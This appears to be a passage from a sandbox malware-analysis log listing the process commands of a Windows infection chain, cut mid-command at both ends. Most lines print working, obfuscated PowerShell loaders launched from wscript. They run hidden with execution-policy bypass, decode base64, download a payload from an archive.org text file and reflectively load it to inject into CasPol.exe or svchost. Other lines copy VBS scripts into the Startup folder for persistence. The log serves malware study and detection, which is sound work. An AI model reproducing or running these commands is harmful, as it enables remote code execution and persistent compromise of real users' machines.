'+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' 